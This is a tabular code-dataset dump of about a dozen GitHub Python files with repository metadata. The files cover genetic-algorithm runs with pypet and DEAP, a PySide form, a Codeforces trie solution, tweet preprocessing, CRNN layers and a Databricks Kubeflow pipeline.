blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c53ec5397ec182007a22d88243b2d4ec32a3f966
|
d6ca0b326f1bd0ce381c6db611f6331096bf4187
|
/examples/example_20_using_deap_manual_runs.py
|
ab46bba8dfec0020018669d017e35953cbda71ea
|
[
"BSD-3-Clause"
] |
permissive
|
SmokinCaterpillar/pypet
|
aa35355d70e8f44be015313494376d993f645d80
|
3d454ac65f89e7833baaf89510f73c546e90d8f6
|
refs/heads/develop
| 2023-08-08T16:01:54.087819 | 2023-02-14T14:59:32 | 2023-02-14T14:59:32 | 12,901,526 | 89 | 22 |
BSD-3-Clause
| 2023-07-24T00:46:12 | 2013-09-17T17:06:00 |
Python
|
UTF-8
|
Python
| false | false | 6,723 |
py
|
""" An example showing how to use DEAP optimization (http://pythonhosted.org/deap/).
DEAP can be combined with *pypet* to keep track of all the data and the full trajectory
of points created by a genetic algorithm.
Note that *pypet* adds quite some overhead to the optimization algorithm.
Using *pypet* in combination with DEAP is only suitable in case the
evaluation of an individual (i.e. a single run) takes a considerable amount of time
(i.e. 1 second or longer) and, thus, pypet's overhead is only marginal.
This *OneMax* problem serves only as an example and is not a well suited problem.
Suitable would be the genetic optimization of neural networks where running and evaluating
the network may take a few seconds.
Here we avoid using an Environment and *manually* execute runs using multiprocessing.
"""
__author__ = 'Robert Meyer'
import random
import os
import multiprocessing as multip
try:
from itertools import izip
except ImportError:
# For Python 3
izip = zip
from deap import base
from deap import creator
from deap import tools
from pypet import Trajectory, cartesian_product, manual_run, MultiprocContext
@manual_run(store_meta_data=True) # Important decorator for manual execution of runs
def eval_one_max(traj, individual):
"""The fitness function"""
traj.f_add_result('$set.$.individual', list(individual))
fitness = sum(individual)
traj.f_add_result('$set.$.fitness', fitness)
traj.f_store()
return (fitness,) # DEAP wants a tuple here!
def eval_wrapper(the_tuple):
"""Wrapper function that unpacks a single tuple as arguments to the fitness function.
The pool's map function only allows a single iterable so we need to zip it first
and then unpack it here.
"""
return eval_one_max(*the_tuple)
def main():
# No environment here ;-)
filename = os.path.join('experiments', 'example_20.hdf5')
traj = Trajectory('onemax', filename=filename, overwrite_file=True)
# ------- Add parameters ------- #
traj.f_add_parameter('popsize', 100)
traj.f_add_parameter('CXPB', 0.5)
traj.f_add_parameter('MUTPB', 0.2)
traj.f_add_parameter('NGEN', 20)
traj.f_add_parameter('generation', 0)
traj.f_add_parameter('ind_idx', 0)
traj.f_add_parameter('ind_len', 50)
traj.f_add_parameter('indpb', 0.005)
traj.f_add_parameter('tournsize', 3)
traj.f_add_parameter('seed', 42)
traj.f_store(only_init=True)
# ------- Create and register functions with DEAP ------- #
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness=creator.FitnessMax)
toolbox = base.Toolbox()
# Attribute generator
toolbox.register("attr_bool", random.randint, 0, 1)
# Structure initializers
toolbox.register("individual", tools.initRepeat, creator.Individual,
toolbox.attr_bool, traj.ind_len)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# Operator registering
toolbox.register("mate", tools.cxTwoPoint)
toolbox.register("mutate", tools.mutFlipBit, indpb=traj.indpb)
toolbox.register("select", tools.selTournament, tournsize=traj.tournsize)
toolbox.register("evaluate", eval_wrapper)
pool = multip.Pool(4)
toolbox.register("map", pool.map) # We use the pool's map function!
# ------- Initialize Population -------- #
random.seed(traj.seed)
pop = toolbox.population(n=traj.popsize)
CXPB, MUTPB, NGEN = traj.CXPB, traj.MUTPB, traj.NGEN
start_idx = 0 # We need to count executed runs
print("Start of evolution")
for g in range(traj.NGEN):
print("-- Generation %i --" % g)
# Determine individuals that need to be evaluated
eval_pop = [ind for ind in pop if not ind.fitness.valid]
# Add as many explored runs as individuals that need to be evaluated
traj.f_expand(cartesian_product({'generation': [g], 'ind_idx': range(len(eval_pop))}))
# We need to make the storage service multiprocessing safe
mc = MultiprocContext(traj, wrap_mode='QUEUE')
mc.f_start()
# Create a single iterable to be passed to our fitness function (wrapper).
# `yields='copy'` is important, the pool's `map` function will
# go over the whole iterator at once and store it in memory.
# So for every run we need a copy of the trajectory.
# Alternatively, you could use `yields='self'` and use the pool's `imap` function.
zip_iterable = izip(traj.f_iter_runs(start_idx, yields='copy'), eval_pop)
fitnesses = toolbox.map(eval_wrapper, zip_iterable)
# fitnesses is just a list of tuples [(fitness,), ...]
for idx, fitness in enumerate(fitnesses):
# Update fitnesses
eval_pop[idx].fitness.values = fitness
# Finalize the multiproc wrapper
mc.f_finalize()
# Update start index
start_idx += len(eval_pop)
print(" Evaluated %i individuals" % len(eval_pop))
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in pop]
length = len(pop)
mean = sum(fits) / length
sum2 = sum(x*x for x in fits)
std = abs(sum2 / length - mean**2)**0.5
print(" Min %s" % min(fits))
print(" Max %s" % max(fits))
print(" Avg %s" % mean)
print(" Std %s" % std)
# ------- Create the next generation by crossover and mutation -------- #
if g < traj.NGEN -1: # not necessary for the last generation
# Select the next generation individuals
offspring = toolbox.select(pop, len(pop))
# Clone the selected individuals
offspring = list(map(toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
# The population is entirely replaced by the offspring
pop[:] = offspring
# Stop the multiprocessing pool
pool.close()
pool.join()
print("-- End of (successful) evolution --")
best_ind = tools.selBest(pop, 1)[0]
print("Best individual is %s, %s" % (best_ind, best_ind.fitness.values))
traj.f_store() # And store all the rest of the data
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
a607cfd0c82f0951367c489f47dad4d25eb49d58
|
00829e1ff78f73dab073a201d68139960c1d1922
|
/tools/toolset/tool/rigging/pipline_tool/ui/his/ui_create_character.py
|
42c99cc1874dedb0e213f77abca01d3414e1a31e
|
[] |
no_license
|
liangyongg/Beam_Tools
|
a021ceb4187107508536c46726da5b9629ffd1cf
|
21b5d06e660f058434e589ae4f672f96296b7540
|
refs/heads/master
| 2018-11-04T04:43:02.523654 | 2018-08-26T12:33:09 | 2018-08-26T12:33:09 | 115,005,481 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,908 |
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_create_character.ui'
#
# Created: Thu Apr 26 11:29:46 2018
# by: pyside-uic 0.2.15 running on PySide 1.2.4
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(430, 262)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setContentsMargins(-1, -1, 50, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtGui.QLabel(Form)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.lineEdit = QtGui.QLineEdit(Form)
self.lineEdit.setObjectName("lineEdit")
self.horizontalLayout.addWidget(self.lineEdit)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setContentsMargins(50, -1, 50, -1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.pushButton = QtGui.QPushButton(Form)
self.pushButton.setObjectName("pushButton")
self.verticalLayout_2.addWidget(self.pushButton)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "name:", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton.setText(QtGui.QApplication.translate("Form", "create", None, QtGui.QApplication.UnicodeUTF8))
|
[
"hhhh"
] |
hhhh
|
ce74a238c917af6de5cfc93964163002750f06d8
|
59de7788673ade984b9c9fbc33664a7cbdba67d3
|
/res/scripts/client_common/shared_utils/__init__.py
|
9b417b171ce7cf3e50a53c5b6006973b705af2f6
|
[] |
no_license
|
webiumsk/WOT-0.9.15-CT
|
3fa24ab37a6c91b7073034afb2f355efa5b7fe36
|
fbd194fbaa6bdece51c7a68fc35bbb5257948341
|
refs/heads/master
| 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null |
WINDOWS-1250
|
Python
| false | false | 4,366 |
py
|
# 2016.05.01 15:25:53 Střední Evropa (letní čas)
# Embedded file name: scripts/client_common/shared_utils/__init__.py
import weakref
import itertools
import types
import BigWorld
from debug_utils import LOG_ERROR, LOG_WARNING
ScalarTypes = (types.IntType,
types.LongType,
types.FloatType,
types.BooleanType) + types.StringTypes
IntegralTypes = (types.IntType, types.LongType)
def makeTupleByDict(ntClass, data):
unsupportedFields = set(data) - set(ntClass._fields)
supported = {}
for k, v in data.iteritems():
if k not in unsupportedFields:
supported[k] = v
return ntClass(**supported)
class BoundMethodWeakref(object):
def __init__(self, func):
self.methodName = func.__name__
raise not self.methodName.startswith('__') or AssertionError('BoundMethodWeakref: private methods are not supported')
self.wrefCls = weakref.ref(func.__self__)
def __call__(self, *args, **kwargs):
return getattr(self.wrefCls(), self.methodName)(*args, **kwargs)
def forEach(function, sequence):
for e in sequence:
function(e)
def isEmpty(sequence):
try:
next(sequence)
except StopIteration:
return True
return False
def safeCancelCallback(callbackID):
try:
BigWorld.cancelCallback(callbackID)
except ValueError:
LOG_ERROR('Cannot cancel BigWorld callback: incorrect callback ID.')
def prettyPrint(dict, sort_keys = True, indent = 4):
import json
return json.dumps(dict, sort_keys=sort_keys, indent=indent)
def findFirst(function_or_None, sequence, default = None):
try:
return next(itertools.ifilter(function_or_None, sequence))
except StopIteration:
return default
def first(sequence, default = None):
return findFirst(None, sequence, default)
class CONST_CONTAINER(object):
__keyByValue = None
@classmethod
def getIterator(cls):
for k, v in cls.__dict__.iteritems():
if not k.startswith('_') and type(v) in ScalarTypes:
yield (k, v)
@classmethod
def getKeyByValue(cls, value):
cls.__doInit()
return cls.__keyByValue.get(value)
@classmethod
def hasKey(cls, key):
return key in cls.__dict__
@classmethod
def hasValue(cls, value):
cls.__doInit()
return value in cls.__keyByValue
@classmethod
def ALL(cls):
return tuple([ v for k, v in cls.getIterator() ])
@classmethod
def __doInit(cls):
if cls.__keyByValue is None:
cls.__keyByValue = dict(((v, k) for k, v in cls.getIterator()))
return
class BitmaskHelper(object):
@classmethod
def add(cls, mask, flag):
if not mask & flag:
mask |= flag
return mask
return -1
@classmethod
def addIfNot(cls, mask, flag):
if not mask & flag:
mask |= flag
return mask
@classmethod
def remove(cls, mask, flag):
if mask & flag > 0:
mask ^= flag
return mask
return -1
@classmethod
def removeIfHas(cls, mask, flag):
if mask & flag > 0:
mask ^= flag
return mask
class AlwaysValidObject(object):
def __init__(self, name = ''):
self.__name = name
def __getattr__(self, item):
if item in self.__dict__:
return self.__dict__[item]
return AlwaysValidObject(self._makeName(self.__name, item))
def __call__(self, *args, **kwargs):
return AlwaysValidObject()
def getName(self):
return self.__name
@classmethod
def _makeName(cls, parentName, nodeName):
return '%s/%s' % (parentName, nodeName)
def isDefaultDict(sourceDict, defaultDict):
for k, v in defaultDict.iteritems():
if k not in sourceDict:
return False
if sourceDict[k] != v:
return False
return True
def nextTick(func):
"""
Moves function calling to the next frame
"""
def wrapper(*args, **kwargs):
BigWorld.callback(0.01, lambda : func(*args, **kwargs))
return wrapper
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client_common\shared_utils\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:25:53 Střední Evropa (letní čas)
|
[
"[email protected]"
] | |
01bc8dd81cafcbbf52dd9b8525c0fd40f828b6f4
|
274521d5ccfbaebb97cdfbfa340d951eee7c9efa
|
/Python/PythonProgrammingLanguage/Encapsulation/encap_env/bin/jsonschema
|
116515a0218c94456db568d63ab738fffe5c5f5e
|
[
"MIT"
] |
permissive
|
nitin-cherian/LifeLongLearning
|
ef8e1ed61e4bf8b6ae4a0ae642c559ab47be84b4
|
84084792058358365162c645742c70064a2d5fd6
|
refs/heads/master
| 2021-01-21T10:38:41.797326 | 2018-08-23T01:28:10 | 2018-08-23T01:28:10 | 91,701,351 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 323 |
#!/home/nitin/Learn/Repositories/Github/LifeLongLearning/Python/PythonProgrammingLanguage/Encapsulation/encap_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jsonschema.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
76ba202c34534ea332d0d9c2b7c22175514cb943
|
bf331831c2c532d76b91c11127cc4c76cf9f0031
|
/166/D/ans_errorneous.py
|
eac398768204dd7b212a8fb9e6f37ee62331d50c
|
[] |
no_license
|
mugenen/Codeforces-Solution
|
519899d658a52dc87bfdba81110e9851ccf3b6de
|
f69874ad46acc511f4485dc29249f7010f562ea9
|
refs/heads/master
| 2021-01-22T04:49:48.986989 | 2013-02-25T12:36:10 | 2013-02-25T12:36:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,288 |
py
|
import sys
import collections
import bisect
import math
class Trie:
class Node:
def __init__(self, x, bros = None, child = None):
self.data = x
self.bros = bros
self.child = child
def get_child(self, x):
child = self.child
while child:
if child.data == x: break
child = child.bros
return child
def set_child(self, x):
child = Trie.Node(x, self.child)
self.child = child
return child
def traverse(self, leaf, filter, count, k):
# print self.data
if self.data == '$':
yield []
else:
child = self.child
while child:
temp = count
if self.data in filter:
temp += 1
if temp > k:
child = child.bros
continue
for x in child.traverse(leaf, filter, temp, k):
yield [self.data] + x
child = child.bros
def __init__(self, x = None):
self.root = Trie.Node(None)
self.leaf = x
def insert(self, seq):
node = self.root
for x in seq:
child = node.get_child(x)
if not child:
child = node.set_child(x)
node = child
if not node.get_child(self.leaf):
node.set_child(self.leaf)
def traverse(self, filter, k):
node = self.root.child
while node:
for x in node.traverse(self.leaf, filter, 0, k):
yield x
node = node.bros
string = raw_input()
filter_txt = raw_input()
k = int(raw_input())
filter = set()
A = ord('a')
for i in xrange(len(filter_txt)):
if filter_txt[i] == '0':
filter.add(chr(A + i))
trie = Trie()
for i in xrange(len(string)):
for j in xrange(i + 1, len(string) + 1):
trie.insert(string[i:j] + '$')
# print string[i:j] + '$', i, j
result = 0
check = set()
for s in trie.traverse(filter, k):
if s != []:
# print s
check.add(''.join(s))
# result += 1
#print result
print len(check)
|
[
"[email protected]"
] | |
627649476ff37a030466b373ef750b7e153b0eb0
|
498fcf34fa4482be5c9fefc488666e60edcf46c7
|
/supervised_learning/0x01-classification/17-deep_neural_network.py~
|
90473c634dabec13840cc70707d19fee907312fb
|
[] |
no_license
|
MansourKef/holbertonschool-machine_learning
|
7dbc465def04c311c1afb0e8b8903cbe34c72ad3
|
19f78fc09f0ebeb9f27f3f76b98e7a0e9212fd22
|
refs/heads/main
| 2023-03-12T16:18:08.919099 | 2021-03-05T09:42:09 | 2021-03-05T09:42:09 | 317,303,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,201 |
#!/usr/bin/env python3
"""module"""
import numpy as np
class DeepNeuralNetwork:
"""Deep Neural Network"""
def __init__(self, nx, layers):
"""Constructor"""
if not type(nx) is int:
raise TypeError("nx must be an integer")
if nx < 1:
raise ValueError("nx must be a positive integer")
if not type(layers) is list or len(layers) == 0:
raise TypeError("layers must be a list of positive integers")
self.L = len(layers)
self.cache = {}
self.weights = {}
for i in range(len(layers)):
if layers[i] <= 0 or not type(layers[i]) is int:
raise TypeError("layers must be a list of positive integers")
if i == 0:
self.weights['W{}'.format(i+1)] = \
np.random.randn(layers[i], nx) * np.sqrt(2/(nx))
self.weights['b{}'.format(i+1)] = np.zeros([layers[i], 1])
else:
self.weights['W{}'.format(i+1)] = \
np.random.randn(layers[i], layers[i-1]) * \
np.sqrt(2/(layers[i-1]))
self.weights['b{}'.format(i+1)] = np.zeros([layers[i], 1])
|
[
"[email protected]"
] | ||
0c98c3fa06970c85f3b2a81e02355551274fcf41
|
5b22437902bffa0f62b375d56bfb2b4485ef43f0
|
/src/video_inpainting/padded_masked_video_tar_dataset.py
|
93491de023c768894243ad89932a5aa1d0875600
|
[
"MIT",
"CC-BY-SA-3.0",
"CC-BY-SA-4.0"
] |
permissive
|
JohnsonzxChang/devil
|
eafa09f5258b4f33eda9564077814c6e63473a0f
|
296115cd5f4952c7dc65bbcaaf2d1d5c55ef5d35
|
refs/heads/public
| 2023-07-03T12:07:58.917440 | 2021-08-10T00:06:38 | 2021-08-10T00:06:38 | 555,846,483 | 1 | 0 |
MIT
| 2022-10-22T13:22:43 | 2022-10-22T13:22:42 | null |
UTF-8
|
Python
| false | false | 1,437 |
py
|
import tarfile
from itertools import cycle
from .padded_masked_video_dataset import PaddedMaskedVideoDataset
class PaddedMaskedVideoTarDataset(PaddedMaskedVideoDataset):
def __init__(self, frames_dataset_path, masks_dataset_path):
self._frames_dataset_tar = tarfile.open(frames_dataset_path, 'r')
self._masks_dataset_tar = tarfile.open(masks_dataset_path, 'r')
frame_video_names = sorted([info.name for info in self._frames_dataset_tar.getmembers() if info.isdir()])
mask_video_names = sorted([info.name for info in self._masks_dataset_tar.getmembers() if info.isdir()])
super().__init__(frame_video_names, mask_video_names)
def video_frame_files_iter(self, frame_video_name):
frame_paths = sorted([info.name for info in self._frames_dataset_tar.getmembers()
if info.name.startswith(frame_video_name) and info.isfile()])
for frame_path in frame_paths:
yield self._frames_dataset_tar.extractfile(frame_path)
def video_mask_files_iter(self, mask_video_name):
mask_paths = sorted([info.name for info in self._masks_dataset_tar.getmembers()
if info.name.startswith(mask_video_name) and info.isfile()])
mask_paths_c = cycle(mask_paths + mask_paths[len(mask_paths)-2:0:-1])
for mask_path in mask_paths_c:
yield self._masks_dataset_tar.extractfile(mask_path)
|
[
"[email protected]"
] | |
dbe01cfd78374273c1c4be47f16e8c86a9962fcb
|
13d222bc3332378d433835914da26ed16b583c8b
|
/src/pemjh/challenge52/main.py
|
b1407abc5c0d32694b4aaf0241a641dcaad75fcd
|
[] |
no_license
|
mattjhussey/pemjh
|
c27a09bab09cd2ade31dc23fffac07374bea9366
|
2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99
|
refs/heads/master
| 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 681 |
py
|
""" Challenge052 """
def get_sorted_string(unsorted):
"""
>>> get_sorted_string(54326)
'23456'
>>> get_sorted_string("aBayU")
'BUaay'
"""
return "".join(sorted(str(unsorted)))
def main():
""" challenge052 """
root = 0
found = False
while not found:
root += 1
root_sorted = get_sorted_string(root)
found = True
for i in range(2, 7):
# Try i * root
multiple = root * i
multiple_sorted = get_sorted_string(multiple)
if root_sorted != multiple_sorted:
found = False
break
return root
|
[
"[email protected]"
] | |
fcf6d5b203f22c6e42690390171431383fde3627
|
9b328903c7ce1ddfc957c6db4a5fef265bce1dad
|
/preprocess.py
|
2d04c659dfe88bfdce2082cc1a99285c36834611
|
[] |
no_license
|
matatabinoneko/viral_tweet_generation
|
4a610b0327d7ce0e8e2b94eec0f82aa9f1c35ca1
|
1e26de293420dbed6f50f161b3210c9d14e3b2d4
|
refs/heads/main
| 2023-03-12T16:11:14.187622 | 2021-03-02T00:11:47 | 2021-03-02T00:11:47 | 330,305,509 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,466 |
py
|
'''
ツイートの前処理を行う
'''
import argparse
import logzero
from logzero import logger
import logging
from os import path
from typing import List
from filtering_type import EmoticonFilter
import json
import MeCab
from collections import defaultdict
import re
logger.setLevel(logging.INFO)
mecabTagger = MeCab.Tagger("-Ochasen")
hiragana = re.compile('[ぁ-ゟ]+')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-i', '--input', type=path.abspath, help='input file path')
parser.add_argument(
'-o', '--output', type=path.abspath, help='output file path')
parser.add_argument(
"--tokenizer", type=str, default="char", help="tokenizer. Select mecab if you want to use mecab"
)
args = parser.parse_args()
return args
def full_width2half_width(text: str) -> str:
'''
全角文字を半角文字に変換
'''
# 変換
text = text.translate(str.maketrans(
{chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))
return text
def test_full_width2half_width():
text = "!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`>?@abcdefghijklmnopqrstuvwxyz{|}~"
trans_text = full_width2half_width(text)
answer = '!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`>?@abcdefghijklmnopqrstuvwxyz{|}~'
assert trans_text == answer, f"{trans_text}\n{answer}"
def is_char_length(text: str, max_length=140) -> bool:
'''
max_length以上のツイートの場合はFalseを返す
'''
return len(text) <= 140
def test_is_char_length():
text_list = ["", ''.join(['a' for _ in range(139)]), ''.join(
['a' for _ in range(140)]), ''.join(['a' for _ in range(141)])]
answer_list = [True, True, True, False]
for text, answer in zip(text_list, answer_list):
assert is_char_length(text) == answer
def get_keywords(text: str) -> List[str]:
"""
ツイートからキーワードを抽出
Parameters
----------
text : str
ツイート
Returns
-------
keywords : List[str]
キーワードのリスト
"""
keywords = []
node = mecabTagger.parseToNode(text)
while node:
word = node.surface
hinshi = node.feature.split(",")
if hinshi[0] == "名詞" and hinshi[1] != "代名詞" and not hiragana.fullmatch(word):
keywords.append(word)
node = node.next
keywords = list(set(keywords))
return keywords
def test_get_keywords():
queries = ["私のご飯", 'あれとこれ', 'ももとすもも']
answers = [["ご飯"], [], []]
for q, a in zip(queries, answers):
q = get_keywords(q)
assert set(q) == set(a), f"{q},{a}"
def main():
args = parse_args()
logger.info(args)
def tokenizer(text): return self.mecab.parse(text).split(
) if args.tokenizer == 'mecab' else ' '.join(list(text))
filter = EmoticonFilter()
cnt_dic = defaultdict(int)
with open(args.input, 'r') as fin, open(args.output, 'w') as fout:
for line in fin:
try:
line = json.loads(line)
text = line["text"]
# 顔文字を含むツイートは除外
if filter._has_emoticon(text):
cnt_dic['emoji'] += 1
continue
if not is_char_length(text):
logger.debug(f"this tweet is exceed 140 chars. \n{text}")
cnt_dic["more_than_140"] += 1
continue
# user nameを削除
text = filter._username_filter(text)
# スペースなどを置換
text = filter._normalization(text)
keywords = list(map(tokenizer, get_keywords(text)))
text = tokenizer(text)
print(json.dumps(
{"keywords": keywords, "tweet": text}, ensure_ascii=False), file=fout)
except:
cnt_dic['error'] += 1
logger.error(f"this data is skipped {line}")
logger.info(
f"emoji tweet: {cnt_dic['emoji']}\nmore than 140 tweet:{cnt_dic['more_than_140']}\nerror:{cnt_dic['error']}")
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
caa4886993b2a6034b738129474f78353d70e2af
|
c427d9142df033af2b509412153dae35706ede61
|
/recognition/pytorch_crnn/models/layers.py
|
fbaa09d9385382391ff58e1b8a380ebc4e74d249
|
[] |
no_license
|
brahimbellahcen/ocr_toolkit
|
0b68776fe20b05f48807f856fffac752e3e08e66
|
b4516d4193132eb48f821926dd6ef5d368f53899
|
refs/heads/master
| 2022-11-13T10:21:14.083497 | 2020-06-26T15:31:38 | 2020-06-26T15:31:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,032 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class blockCNN(nn.Module):
def __init__(self, in_nc, out_nc, kernel_size, padding, stride=1):
super(blockCNN, self).__init__()
self.in_nc = in_nc
self.out_nc = out_nc
self.kernel_size = kernel_size
self.padding = padding
# layers
self.conv = nn.Conv2d(in_nc, out_nc,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_nc)
def forward(self, batch, use_bn=False, use_relu=False,
use_maxpool=False, maxpool_kernelsize=None):
"""
in:
batch - [batch_size, in_nc, H, W]
out:
batch - [batch_size, out_nc, H', W']
"""
batch = self.conv(batch)
if use_bn:
batch = self.bn(batch)
if use_relu:
batch = F.relu(batch)
if use_maxpool:
assert maxpool_kernelsize is not None
batch = F.max_pool2d(batch, kernel_size=maxpool_kernelsize, stride=2)
return batch
class blockRNN(nn.Module):
def __init__(self, in_size, hidden_size, out_size, bidirectional, dropout=0):
super(blockRNN, self).__init__()
self.in_size = in_size
self.hidden_size = hidden_size
self.out_size = out_size
self.bidirectional = bidirectional
# layers
self.gru = nn.GRU(in_size, hidden_size, bidirectional=bidirectional)
def forward(self, batch, add_output=False):
"""
in array:
batch - [seq_len , batch_size, in_size]
out array:
out - [seq_len , batch_size, out_size]
"""
# batch_size = batch.size(1)
outputs, hidden = self.gru(batch)
out_size = int(outputs.size(2) / 2)
if add_output:
outputs = outputs[:, :, :out_size] + outputs[:, :, out_size:]
return outputs
|
[
"[email protected]"
] | |
39aeb6e973594342d29c7e0c62856e9bdb055bea
|
e5ee4f343d9523129298e1cd989b52a142028cfe
|
/samples/contrib/azure-samples/databricks-pipelines/databricks_cluster_pipeline.py
|
4cbd45e50b4cab9d62b7e153d21fb6660ecc37ea
|
[
"Apache-2.0"
] |
permissive
|
joaoalvarenga/pipelines
|
67c5b2c906134be8d4814a0851e4b60dfa4adf44
|
493c3d4e980b94a963a257247c6eb2d970b3dafa
|
refs/heads/master
| 2020-12-08T18:22:52.433779 | 2020-01-10T05:00:34 | 2020-01-10T05:00:34 | 233,059,234 | 1 | 0 |
Apache-2.0
| 2020-01-10T14:03:36 | 2020-01-10T14:03:35 | null |
UTF-8
|
Python
| false | false | 1,780 |
py
|
"""Create a cluster in Databricks. Then submit a one-time Run to that cluster."""
import kfp.dsl as dsl
import kfp.compiler as compiler
import databricks
def create_cluster(cluster_name):
return databricks.CreateClusterOp(
name="createcluster",
cluster_name=cluster_name,
spark_version="5.3.x-scala2.11",
node_type_id="Standard_D3_v2",
spark_conf={
"spark.speculation": "true"
},
num_workers=2
)
def submit_run(run_name, cluster_id, parameter):
return databricks.SubmitRunOp(
name="submitrun",
run_name=run_name,
existing_cluster_id=cluster_id,
libraries=[{"jar": "dbfs:/docs/sparkpi.jar"}],
spark_jar_task={
"main_class_name": "org.apache.spark.examples.SparkPi",
"parameters": [parameter]
}
)
def delete_run(run_name):
return databricks.DeleteRunOp(
name="deleterun",
run_name=run_name
)
def delete_cluster(cluster_name):
return databricks.DeleteClusterOp(
name="deletecluster",
cluster_name=cluster_name
)
@dsl.pipeline(
name="DatabricksCluster",
description="A toy pipeline that computes an approximation to pi with Azure Databricks."
)
def calc_pipeline(cluster_name="test-cluster", run_name="test-run", parameter="10"):
create_cluster_task = create_cluster(cluster_name)
submit_run_task = submit_run(run_name, create_cluster_task.outputs["cluster_id"], parameter)
delete_run_task = delete_run(run_name)
delete_run_task.after(submit_run_task)
delete_cluster_task = delete_cluster(cluster_name)
delete_cluster_task.after(delete_run_task)
if __name__ == "__main__":
compiler.Compiler().compile(calc_pipeline, __file__ + ".tar.gz")
|
[
"[email protected]"
] | |
5b46996c84345b6406c48c03241e97ddfdbd1ac8
|
d066f7fe739fb78f74ec2de8ccbfefdd4270f60f
|
/appimagebuilder/__init__.py
|
5b4148a08e2776e617d6700c316eba5fc4629b93
|
[
"MIT"
] |
permissive
|
AppImageCrafters/appimage-builder
|
666e75363a74f615cdb3673b3ca9d51a6d292a49
|
f38699ef3644fa5409a5a262b7b6d99d6fb85db9
|
refs/heads/main
| 2023-08-17T06:34:54.029664 | 2023-06-03T17:51:04 | 2023-06-03T17:51:04 | 218,847,680 | 270 | 54 |
MIT
| 2023-09-06T17:04:18 | 2019-10-31T19:44:17 |
Python
|
UTF-8
|
Python
| false | false | 651 |
py
|
#!/usr/bin/env python3
# Copyright 2020 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
